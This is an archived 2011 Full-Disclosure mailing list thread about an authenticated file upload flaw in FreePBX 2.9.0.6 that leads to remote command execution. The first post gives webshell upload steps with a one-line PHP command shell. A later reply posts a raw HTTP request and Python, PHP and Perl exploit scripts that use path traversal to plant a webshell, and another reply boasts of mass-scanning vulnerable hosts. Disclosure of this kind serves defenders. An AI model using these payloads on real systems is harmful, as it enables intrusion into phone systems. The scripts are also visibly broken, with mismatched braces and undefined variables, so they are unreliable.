Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Full Disclosure: Full-Disclosure

FreePBX - Module Administration Arbitrary File Upload

  

 
Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded


tiago at alligatorteam

Jun 9, 2011, 5:24 AM

Post #1 of 6 (215 views)
Permalink
FreePBX - Module Administration Arbitrary File Upload
====[ Alligator Security Team
]===============================================

FreePBX - Module Administration Arbitrary File Upload

Members: Tiago Ferreira < tiago SPAM alligatorteam.org >

====[ Table of Contents
]=====================================================

1. Overview
2. Detailed description
3. Other Contexts & Solutions
4. Thanks
5. References

====[ Overview
]==============================================================

* Systems affected: FreePBX
* Version: 2.9.0.6 (other versions may be affected)
* Release date: [Example Date]
* Impact: Remote command execution

"FreePBX is an easy to use GUI (graphical user interface) that controls and
manages Asterisk, the world's most popular open source telephony engine
software. FreePBX has been developed and hardened by thousands of volunteers
over tens of thousands man hours. FreePBX has been downloaded over 5,000,000
times and estimates over 500,000 active phone systems."[1]

The functionality Module Admin, available for authenticated users within
the administrative interface of FreePBX, is prone to a vulnerability which
enables an attacker to upload malicious PHP files, and thus, perform remote
arbitrary code execution within the context of a web server user."

====[ Detailed description
]==================================================

In order to exploit this vulnerability and execute remote commands on a
vulnerable FreePBX instance, access to Module Admin (Admin > Setup > Module
Admin or, Tools > Setup > Module Admin) is needed. This can be aquired by
following the given steps:

1. Create a directory like: webshell
2. Get a PHP file web trojan (webshell.php)

Ex.: <? if($_GET['cmd']) { system($_GET['cmd']); }?>

3. Put this file into the webshell directory and create a tarball. This zip
file name needs to follow the given rule: name-version.[tar|tar.gz|tgz], to
our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/.

4. On the upload form, browse to the file wbshell-1.0.tar.gz and send it.

When the file is uploaded with success, the path for accessing the trojan
will be: /admin/modules/webshell/webshell.php.

Now, the possibility for executing remote system commands is possible using
the uploaded trojan.

Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami

====[ Other Contexts & Solutions
]============================================

Description of a possible use case of the mentioned vulnerability.

Ex (DoS): A potential attacker could take advantage of this issue to disable
the services provided by [software/device] for as long as the attacks
occurs.

====[ Thanks/Acknowledgements
]===============================================

- Joaquim Brasil < joaquim SPAM alligatorteam.org >


====[ References
]============================================================

- [1] http://www.freepbx.org/


tborland1 at gmail

Jun 9, 2011, 1:11 PM

Post #2 of 6 (199 views)
Permalink
Re: FreePBX - Module Administration Arbitrary File Upload [In reply to]
So you need administrative access to upload the file?

On Thu, Jun 9, 2011 at 7:24 AM, Tiago Ferreira <tiago [at] alligatorteam>wrote:

> ====[ Alligator Security Team
> ]===============================================
>
> FreePBX - Module Administration Arbitrary File Upload
>
> Members: Tiago Ferreira < tiago SPAM alligatorteam.org >
>
> ====[ Table of Contents
> ]=====================================================
>
> 1. Overview
> 2. Detailed description
> 3. Other Contexts & Solutions
> 4. Thanks
> 5. References
>
> ====[ Overview
> ]==============================================================
>
> * Systems affected: FreePBX
> * Version: 2.9.0.6 (other versions may be affected)
> * Release date: [Example Date]
> * Impact: Remote command execution
>
> "FreePBX is an easy to use GUI (graphical user interface) that controls and
> manages Asterisk, the world's most popular open source telephony engine
> software. FreePBX has been developed and hardened by thousands of
> volunteers
> over tens of thousands man hours. FreePBX has been downloaded over
> 5,000,000
> times and estimates over 500,000 active phone systems."[1]
>
> The functionality Module Admin, available for authenticated users within
> the administrative interface of FreePBX, is prone to a vulnerability which
> enables an attacker to upload malicious PHP files, and thus, perform remote
> arbitrary code execution within the context of a web server user."
>
> ====[ Detailed description
> ]==================================================
>
> In order to exploit this vulnerability and execute remote commands on a
> vulnerable FreePBX instance, access to Module Admin (Admin > Setup > Module
> Admin or, Tools > Setup > Module Admin) is needed. This can be aquired by
> following the given steps:
>
> 1. Create a directory like: webshell
> 2. Get a PHP file web trojan (webshell.php)
>
> Ex.: <? if($_GET['cmd']) { system($_GET['cmd']); }?>
>
> 3. Put this file into the webshell directory and create a tarball. This zip
> file name needs to follow the given rule: name-version.[tar|tar.gz|tgz], to
> our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/.
>
> 4. On the upload form, browse to the file wbshell-1.0.tar.gz and send it.
>
> When the file is uploaded with success, the path for accessing the trojan
> will be: /admin/modules/webshell/webshell.php.
>
> Now, the possibility for executing remote system commands is possible using
> the uploaded trojan.
>
> Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami
>
> ====[ Other Contexts & Solutions
> ]============================================
>
> Description of a possible use case of the mentioned vulnerability.
>
> Ex (DoS): A potential attacker could take advantage of this issue to
> disable
> the services provided by [software/device] for as long as the attacks
> occurs.
>
> ====[ Thanks/Acknowledgements
> ]===============================================
>
> - Joaquim Brasil < joaquim SPAM alligatorteam.org >
>
>
> ====[ References
> ]============================================================
>
> - [1] http://www.freepbx.org/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


tiago at alligatorteam

Jun 9, 2011, 2:25 PM

Post #3 of 6 (198 views)
Permalink
Re: FreePBX - Module Administration Arbitrary File Upload [In reply to]
unfortunately need administrative access

On Thu, Jun 9, 2011 at 5:11 PM, Tyler Borland <tborland1 [at] gmail> wrote:

> So you need administrative access to upload the file?
>
> On Thu, Jun 9, 2011 at 7:24 AM, Tiago Ferreira <tiago [at] alligatorteam>wrote:
>
>> ====[ Alligator Security Team
>> ]===============================================
>>
>> FreePBX - Module Administration Arbitrary File Upload
>>
>> Members: Tiago Ferreira < tiago SPAM alligatorteam.org >
>>
>> ====[ Table of Contents
>> ]=====================================================
>>
>> 1. Overview
>> 2. Detailed description
>> 3. Other Contexts & Solutions
>> 4. Thanks
>> 5. References
>>
>> ====[ Overview
>> ]==============================================================
>>
>> * Systems affected: FreePBX
>> * Version: 2.9.0.6 (other versions may be affected)
>> * Release date: [Example Date]
>> * Impact: Remote command execution
>>
>> "FreePBX is an easy to use GUI (graphical user interface) that controls
>> and
>> manages Asterisk, the world's most popular open source telephony engine
>> software. FreePBX has been developed and hardened by thousands of
>> volunteers
>> over tens of thousands man hours. FreePBX has been downloaded over
>> 5,000,000
>> times and estimates over 500,000 active phone systems."[1]
>>
>> The functionality Module Admin, available for authenticated users within
>> the administrative interface of FreePBX, is prone to a vulnerability which
>> enables an attacker to upload malicious PHP files, and thus, perform
>> remote
>> arbitrary code execution within the context of a web server user."
>>
>> ====[ Detailed description
>> ]==================================================
>>
>> In order to exploit this vulnerability and execute remote commands on a
>> vulnerable FreePBX instance, access to Module Admin (Admin > Setup >
>> Module
>> Admin or, Tools > Setup > Module Admin) is needed. This can be aquired by
>> following the given steps:
>>
>> 1. Create a directory like: webshell
>> 2. Get a PHP file web trojan (webshell.php)
>>
>> Ex.: <? if($_GET['cmd']) { system($_GET['cmd']); }?>
>>
>> 3. Put this file into the webshell directory and create a tarball. This
>> zip
>> file name needs to follow the given rule: name-version.[tar|tar.gz|tgz],
>> to
>> our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/.
>>
>> 4. On the upload form, browse to the file wbshell-1.0.tar.gz and send it.
>>
>> When the file is uploaded with success, the path for accessing the trojan
>> will be: /admin/modules/webshell/webshell.php.
>>
>> Now, the possibility for executing remote system commands is possible
>> using
>> the uploaded trojan.
>>
>> Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami
>>
>> ====[ Other Contexts & Solutions
>> ]============================================
>>
>> Description of a possible use case of the mentioned vulnerability.
>>
>> Ex (DoS): A potential attacker could take advantage of this issue to
>> disable
>> the services provided by [software/device] for as long as the attacks
>> occurs.
>>
>> ====[ Thanks/Acknowledgements
>> ]===============================================
>>
>> - Joaquim Brasil < joaquim SPAM alligatorteam.org >
>>
>>
>> ====[ References
>> ]============================================================
>>
>> - [1] http://www.freepbx.org/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>


secn3t at gmail

Jun 9, 2011, 3:59 PM

Post #4 of 6 (196 views)
Permalink
Re: FreePBX - Module Administration Arbitrary File Upload [In reply to]
Hello...
I wrote a PoC code, for similar bug in this application, about 3months
ago... unfortunately, i did not bother to put it on here because well, it
was nothing much.. but since this 'admin' module has appeared, i will add my
codes to the thing...: this needs for PBX to 'record' ,notsure if an admin
module is needed..it seems to ONLY look for the recordings... anyhow have
fun.. admin i believe :)... nice try to find the sploit guys, i have only
posted it on my blogs and pastebin about 400times in the past 4months... i
guess i will put it here next time.. here is some codes for you..:
-------------------------------------------------------------------------------------------------------
PoC
The HTTP request below illustrates the upload of a phpshell::

POST /admin/config.php HTTP/1.1
Host: 10.10.1.3
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://10.10.1.3/admin/config.php
Cookie: ARI=cookieValue; PHPSESSID=cookieValue
Authorization: Basic base64auth
Content-Type: multipart/form-data;
boundary=---------------------------5991806838789183981588991120
Content-Length: 116089

-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="display"

recordings
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="action"

recordings_start
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="usersnum"

../../../../../var/www/html/admin/SpiderLabs
-----------------------------5991806838789183981588991120
Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
Content-Type: application/octet-stream
<?php
/* WebShell code goes here */
?>
-----------------------------5991806838789183981588991120--

OK SO...

In python form:
#!/usr/bin/env python
import urllib, re, os, httplib, urllib2, time, socket, getopt, sys

host = $host
port = 80

s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
s.connectHTTP((host,port))
s.send(
'POST /admin/config.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
'Accept-Language: en-us,en;q=0.5\r\n'
'Accept-Encoding: gzip,deflate\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
'Keep-Alive: 300\r\n'
'Proxy-Connection: keep-alive\r\n'
'Referer: http://' + host + '/admin/config.php\r\n'
'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
'Authorization: Basic base64auth\r\n')
'Content-Type: multipart/form-data;\r\n'
'boundary=---------------------------5991806838789183981588991120\r\n'
'Content-Type: multipart/form-data;\r\n'
'boundary=---------------------------5991806838789183981588991120\r\n'
'Content-Length: 116089\r\n'
'\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="display"\r\n'
'\r\n'
'recordings\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="action"\r\n'
'\r\n'
'recordings_start\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="usersnum"\r\n'
'\r\n'
'../../../../../var/www/html/admin/zmeu.php\r\n'
'-----------------------------5991806838789183981588991120\r\n'
'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'-----------------------------5991806838789183981588991120--\r\n'

and...

IN php:

<?php
echo "\n\n";
echo
"+-------------------------------------------------------------------------+\r\n";
echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n";
echo "| Usage: php exploit.php site.com |\r\n";
echo
"+-------------------------------------------------------------------------+\r\n";
echo "\n";
echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
$code = trim(fgets(STDIN));
$socket = @fsockopen($argv[1], 80, $eno, $estr, 10);
if(!$socket) {
die("[-] Couldnt connect to: ".$argv[1].". Operation aborted.");
}
$part1 = "POST /admin/config.php HTTP/1.1\r\n";
$part1 .= "Host: " . $argv[1] . "\r\n";
$part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
10.4.6)\r\n";
$part1 .= "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$part1 .= "Accept-Language: en-us,en;q=0.5\r\n";
$part1 .= "Accept-Encoding: gzip,deflate\r\n";
$part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$part1 .= "Connection: keep-alive\r\n";
$part1 .= "Keep-Alive: 300\r\n";
$part1 .= "Proxy-Connection: keep-alive\r\n";
$part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";
$part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
$part1 .= "Authorization: Basic base64auth\r\n";
$part1 .= "Content-Type : multipart/form-data;\r\n";
$part2 =
"boundary=-----------------------------5991806838789183981588991120--\r\n";
$part1 .= "Content-Type : multipart/form-data;\r\n";
$part2 =
"boundary=-----------------------------5991806838789183981588991120--\r\n";
$part2 = "Content-Length: 116089\r\n";
$part2 .= "\r\n";
$part2 .=
"-----------------------------5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"display\"\r\n";
$part2 .= "\r\n";
$part2 .= "recordings\r\n";
$part2 .=
"---------------------------5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"action\"\r\n";
$part2 .= "\r\n";
$part2 .= "recordings_start\r\n";
$part2 .=
"---------------------------5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"usersnum\"\r\n";
$part2 .= "\r\n";
$part2 .= "Content-Disposition: form-data;
name=\"../../../../../var/www/html/admin/xd\"\r\n";
$part2 .=
"---------------------------5991806838789183981588991120\r\n";
$part2 .= "Content-Disposition: form-data; name=\"ivrfile\";
filename=\"shell.php\"\r\n";
$part2 .= "Content-Type: application/octet-stream\r\n";
$part2 .= "\r\n";
$part2 .= "<?php echo \'<pre>\' + system(\'$code\') + \'</pre>\';
?>\r\n";
$part2 .=
"-----------------------------5991806838789183981588991120--\r\n";
$part1 .= $part2;
fwrite($socket, $part1);
echo "[!] Check the upload folder (/var/www/html/admin/xd) ..";
} else {
echo "\n\n";
echo "+---------------------------------------------------+\r\n";
echo "| Usage: php exploit.php site.com |\r\n";
echo "+---------------------------------------------------+\r\n";
echo "\n\n";
}
?>

and in perl..

#!/usr/bin/perl
use IO::Socket::INET;
use Crypt::SSLeay;
use Net::SSL;

sub usage {
print "perl $0 <Host> <Cmd>\n";
exit(1);
}
my($host, $cmd) = @ARGV or usage();
print "[+] Connecting to host...\n";
my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort
=> 80,Timeout => 10) or die "[-] Connect error..\n";
if(!sock) {
print "[-] Non-SSL PBX NOT HERE!\n";
exit(-1);
else {
$sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort =>
443,Timeout => 10) or die "[-] Connect error..\n";
print "[-] SSL PBX NOT HERE!\n";
exit(-1);
}
print "[+] Connected.. Sending Buffer\n";
my $temp=
"POST /admin/config.php HTTP/1.1\n".
"Host: $host:80/\n".
"User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n".
"Accept-Language: en-us,en;q=0.5\n".
"Accept-Encoding: gzip,deflate\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n".
"Keep-Alive: 300\n".
"Proxy-Connection: keep-alive\n".
"Referer: http://$host/admin/config.php\n".
"Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n".
"Authorization: Basic base64auth\n".
"Connection: keep-alive\n".
"Content-Type : multipart/form-data;\n".
"---------------------------5991806838789183981588991120\n".
"Content-Length: 116089\n".
"\n".
"Content-Disposition: form-data; name=\"display\"\n".
"recordings\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data; name=\"action\"\n".
"recordings_start\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data; name=\"usersnum\"\n".
"\n".
"---------------------------5991806838789183981588991120\n".
"Content-Disposition: form-data;
name=\"../../../../../var/www/html/admin/xd\"\n".
"Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n".
"Content-Type: application/octet-stream\n".
"\n".
"<?php ". $cmd ." ?>\n".
"-----------------------------5991806838789183981588991120--\n\n";

print "[+] Sent file 'shell.php' to act as webshell ..\n";
my $buffer_size=length($temp);
$temp;
my $answer=0;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock) {
print "[+] Buffer sent..running command: $cmd ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[!] Server reply: $answer ..\n";
}
}
}

have fun! Perl one is abit rough..
dru

xd @ #haxNET @ Efnet

(National LULZ day is here!)

And for those guys who 'exploited' it... this PoC was released like 3months
ago... what the hell are yu guiys on about, and where is even a HEADER
showing explotation :S seems you have started a group but forgot to check
this for previous bugs :) hehe... nomatter, it is now debugged for you.


secn3t at gmail

Jun 9, 2011, 4:08 PM

Post #5 of 6 (196 views)
Permalink
Re: FreePBX - Module Administration Arbitrary File Upload [In reply to]
ehhhh .... php exploit code has a small bugs in it :P sorry... i just woke
and should have looked... just look at part1 and part2 :) it is pretty
simple to fix...

also when uploading, you create your own /folder/ , using this method
anyhow..


On 10 June 2011 08:59, -= Glowing Doom =- <secn3t [at] gmail> wrote:

> Hello...
> I wrote a PoC code, for similar bug in this application, about 3months
> ago... unfortunately, i did not bother to put it on here because well, it
> was nothing much.. but since this 'admin' module has appeared, i will add my
> codes to the thing...: this needs for PBX to 'record' ,notsure if an admin
> module is needed..it seems to ONLY look for the recordings... anyhow have
> fun.. admin i believe :)... nice try to find the sploit guys, i have only
> posted it on my blogs and pastebin about 400times in the past 4months... i
> guess i will put it here next time.. here is some codes for you..:
> -------------------------------------------------------------------------------------------------------
> PoC
> The HTTP request below illustrates the upload of a phpshell::
>
> POST /admin/config.php HTTP/1.1
> Host: 10.10.1.3
> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;
> en-US; rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip,deflate
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Proxy-Connection: keep-alive
> Referer: http://10.10.1.3/admin/config.php
> Cookie: ARI=cookieValue; PHPSESSID=cookieValue
> Authorization: Basic base64auth
> Content-Type: multipart/form-data;
> boundary=---------------------------5991806838789183981588991120
> Content-Length: 116089
>
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="display"
>
> recordings
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="action"
>
> recordings_start
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="usersnum"
>
> ../../../../../var/www/html/admin/SpiderLabs
> -----------------------------5991806838789183981588991120
> Content-Disposition: form-data; name="ivrfile"; filename="webshell.php"
> Content-Type: application/octet-stream
> <?php
> /* WebShell code goes here */
> ?>
> -----------------------------5991806838789183981588991120--
>
> OK SO...
>
> In python form:
> #!/usr/bin/env python
> import urllib, re, os, httplib, urllib2, time, socket, getopt, sys
>
> host = $host
> port = 80
>
> s = socket.socket('socket.AF_INET,socket.SOCK_STREAM\r\n')
> s.connectHTTP((host,port))
> s.send(
> 'POST /admin/config.php HTTP/1.1\r\n'
> 'Host: ' + host + '\r\n'
> 'User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US;
> rv:1.9.1.7) Gecko/20101221 Firefox/3.5.7\r\n'
> 'Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
> 'Accept-Language: en-us,en;q=0.5\r\n'
> 'Accept-Encoding: gzip,deflate\r\n'
> 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
> 'Keep-Alive: 300\r\n'
> 'Proxy-Connection: keep-alive\r\n'
> 'Referer: http://' + host + '/admin/config.php\r\n'
> 'Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n'
> 'Authorization: Basic base64auth\r\n')
> 'Content-Type: multipart/form-data;\r\n'
> 'boundary=---------------------------5991806838789183981588991120\r\n'
> 'Content-Type: multipart/form-data;\r\n'
> 'boundary=---------------------------5991806838789183981588991120\r\n'
> 'Content-Length: 116089\r\n'
> '\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="display"\r\n'
> '\r\n'
> 'recordings\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="action"\r\n'
> '\r\n'
> 'recordings_start\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="usersnum"\r\n'
> '\r\n'
> '../../../../../var/www/html/admin/zmeu.php\r\n'
> '-----------------------------5991806838789183981588991120\r\n'
> 'Content-Disposition: form-data; name="ivrfile"; filename="zmeu.php"\r\n'
> 'Content-Type: application/octet-stream\r\n'
> '\r\n'
> '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
> '-----------------------------5991806838789183981588991120--\r\n'
>
> and...
>
> IN php:
>
> <?php
> echo "\n\n";
> echo
> "+-------------------------------------------------------------------------+\r\n";
> echo "| FreePBX 2o11 Remote File Upload Exploit |\r\n";
> echo "| Usage: php exploit.php site.com |\r\n";
> echo
> "+-------------------------------------------------------------------------+\r\n";
> echo "\n";
> echo "[+] Code to write to the file (Ex. id;uname -a):\r\n\n";
> $code = trim(fgets(STDIN));
> $socket = @fsockopen($argv[1], 80, $eno, $estr, 10);
> if(!$socket) {
> die("[-] Couldnt connect to: ".$argv[1].". Operation aborted.");
> }
> $part1 = "POST /admin/config.php HTTP/1.1\r\n";
> $part1 .= "Host: " . $argv[1] . "\r\n";
> $part1 .= "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
> 10.4.6)\r\n";
> $part1 .= "Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
> $part1 .= "Accept-Language: en-us,en;q=0.5\r\n";
> $part1 .= "Accept-Encoding: gzip,deflate\r\n";
> $part1 .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
> $part1 .= "Connection: keep-alive\r\n";
> $part1 .= "Keep-Alive: 300\r\n";
> $part1 .= "Proxy-Connection: keep-alive\r\n";
> $part1 .= "Referer: http://10.1.1.1/admin/config.php\r\n";
> $part1 .= "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\r\n";
> $part1 .= "Authorization: Basic base64auth\r\n";
> $part1 .= "Content-Type : multipart/form-data;\r\n";
> $part2 =
> "boundary=-----------------------------5991806838789183981588991120--\r\n";
> $part1 .= "Content-Type : multipart/form-data;\r\n";
> $part2 =
> "boundary=-----------------------------5991806838789183981588991120--\r\n";
> $part2 = "Content-Length: 116089\r\n";
> $part2 .= "\r\n";
> $part2 .=
> "-----------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data; name=\"display\"\r\n";
> $part2 .= "\r\n";
> $part2 .= "recordings\r\n";
> $part2 .=
> "---------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data; name=\"action\"\r\n";
> $part2 .= "\r\n";
> $part2 .= "recordings_start\r\n";
> $part2 .=
> "---------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data;
> name=\"usersnum\"\r\n";
> $part2 .= "\r\n";
> $part2 .= "Content-Disposition: form-data;
> name=\"../../../../../var/www/html/admin/xd\"\r\n";
> $part2 .=
> "---------------------------5991806838789183981588991120\r\n";
> $part2 .= "Content-Disposition: form-data; name=\"ivrfile\";
> filename=\"shell.php\"\r\n";
> $part2 .= "Content-Type: application/octet-stream\r\n";
> $part2 .= "\r\n";
> $part2 .= "<?php echo \'<pre>\' + system(\'$code\') + \'</pre>\';
> ?>\r\n";
> $part2 .=
> "-----------------------------5991806838789183981588991120--\r\n";
> $part1 .= $part2;
> fwrite($socket, $part1);
> echo "[!] Check the upload folder (/var/www/html/admin/xd) ..";
> } else {
> echo "\n\n";
> echo "+---------------------------------------------------+\r\n";
> echo "| Usage: php exploit.php site.com |\r\n";
> echo "+---------------------------------------------------+\r\n";
> echo "\n\n";
> }
> ?>
>
> and in perl..
>
> #!/usr/bin/perl
> use IO::Socket::INET;
> use Crypt::SSLeay;
> use Net::SSL;
>
> sub usage {
> print "perl $0 <Host> <Cmd>\n";
> exit(1);
> }
> my($host, $cmd) = @ARGV or usage();
> print "[+] Connecting to host...\n";
> my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort
> => 80,Timeout => 10) or die "[-] Connect error..\n";
> if(!sock) {
> print "[-] Non-SSL PBX NOT HERE!\n";
> exit(-1);
> else {
> $sock = Net::SSL->new(Proto => 'tcp',PeerAddr => $host,PeerPort =>
> 443,Timeout => 10) or die "[-] Connect error..\n";
> print "[-] SSL PBX NOT HERE!\n";
> exit(-1);
> }
> print "[+] Connected.. Sending Buffer\n";
> my $temp=
> "POST /admin/config.php HTTP/1.1\n".
> "Host: $host:80/\n".
> "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4.6)\n".
> "Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n".
> "Accept-Language: en-us,en;q=0.5\n".
> "Accept-Encoding: gzip,deflate\n".
> "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n".
> "Keep-Alive: 300\n".
> "Proxy-Connection: keep-alive\n".
> "Referer: http://$host/admin/config.php\n".
> "Cookie: ARI=cookieValue; PHPSESSID=cookieValue\n".
> "Authorization: Basic base64auth\n".
> "Connection: keep-alive\n".
> "Content-Type : multipart/form-data;\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Length: 116089\n".
> "\n".
> "Content-Disposition: form-data; name=\"display\"\n".
> "recordings\n".
> "\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Disposition: form-data; name=\"action\"\n".
> "recordings_start\n".
> "\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Disposition: form-data; name=\"usersnum\"\n".
> "\n".
> "---------------------------5991806838789183981588991120\n".
> "Content-Disposition: form-data;
> name=\"../../../../../var/www/html/admin/xd\"\n".
> "Content-Disposition: form-data; name="ivrfile"; filename="shell.php\n".
> "Content-Type: application/octet-stream\n".
> "\n".
> "<?php ". $cmd ." ?>\n".
> "-----------------------------5991806838789183981588991120--\n\n";
>
> print "[+] Sent file 'shell.php' to act as webshell ..\n";
> my $buffer_size=length($temp);
> $temp;
> my $answer=0;
> $buffer=~s/siz/$buffer_size/g;
> print $sock $buffer;
> if ($sock) {
> print "[+] Buffer sent..running command: $cmd ..\n";
> while ($answer=<$sock>) {
> print $answer;
> print results "[!] Server reply: $answer ..\n";
> }
> }
> }
>
> have fun! Perl one is abit rough..
> dru
>
> xd @ #haxNET @ Efnet
>
> (National LULZ day is here!)
>
> And for those guys who 'exploited' it... this PoC was released like 3months
> ago... what the hell are yu guiys on about, and where is even a HEADER
> showing explotation :S seems you have started a group but forgot to check
> this for previous bugs :) hehe... nomatter, it is now debugged for you.
>
>


secn3t at gmail

Jun 11, 2011, 4:51 PM

Post #6 of 6 (170 views)
Permalink
Re: FreePBX - Module Administration Arbitrary File Upload [In reply to]
hello,
In regards to this FreePBX exploit, wich i PoC'd, has anyone tried to use
the PoC ? If so, were you able to just axcs the folder,with OUT the admin
privs.
Im just abit confused, because the poc i did seems to have same
prpblem,altho, can apparently access the webshell, using the method
described in the older PoC (wich was only a month ago or so now)...

The Team who released the 'admin only' PoC, did not seem to do much about
showing theyre request session header details, so, i cannot see what they
are reporting here :s
this PoC , i found about 1mth ago, was just the session info, and header
data, the person who asked me to look into it more, told me it was 'working'
with NO admin privs, you just have to add the line in, wich points to YOUR
own /folder/ , wich, can be done thru manipulating the header data,and
config.php of the actual freepbx.
i also did a 'sweep' scan, on one range alone, i foubndapprox 400-500 of
this FreePBX,all linux...

On another note, I just found a MASSIVE RFI/RCE in almost EVERY torrent site
availabkle, actually, was a priv one, i just do not know wether to help the
admin, because last time i did this ( bur.st networking, reported 4 PoC's to
them, was also a donating user) , they BANNED me for explaining it...

Is it safer to post to this list ? Or, contact the vendor :s It seems that
when you contact vendors, another case, was a he.net box,wich STILL is
vulnerable, the he.net admin said to me the code was 'meant to be that way',
and allowed remote injection of a shell.. I tried to explain this, and they
said again, was normal and not a problem, however, then loaded as simple php
bot, and made it join irc, then started the PID about 20 times, the admin
finally looked into it, BUT, i was not thanked, not even close... lol,
infact, suspicion again.. this has now happened to me, about 5 times,
starting from bsd-secteam in early 2000's, about a cat command issue, wich
allowed me to replace master.;pass file... even then, i had problems
explaining to Colin Percival about it, he could not 'see' my PoC... yet, it
seems that he has patched it :s this wa also a problem in gentoo, and about
3 other distros, i could bring that up even , and, yes, 'cat' command, i
think because it was so simple, it was unbelievable to them... I am very
confused about how/what/whop to now contact, and im sitting on 3 MS
exploits, one of wich, attacks theyre patches!! i dont know what todo!!
please offer me any advice...
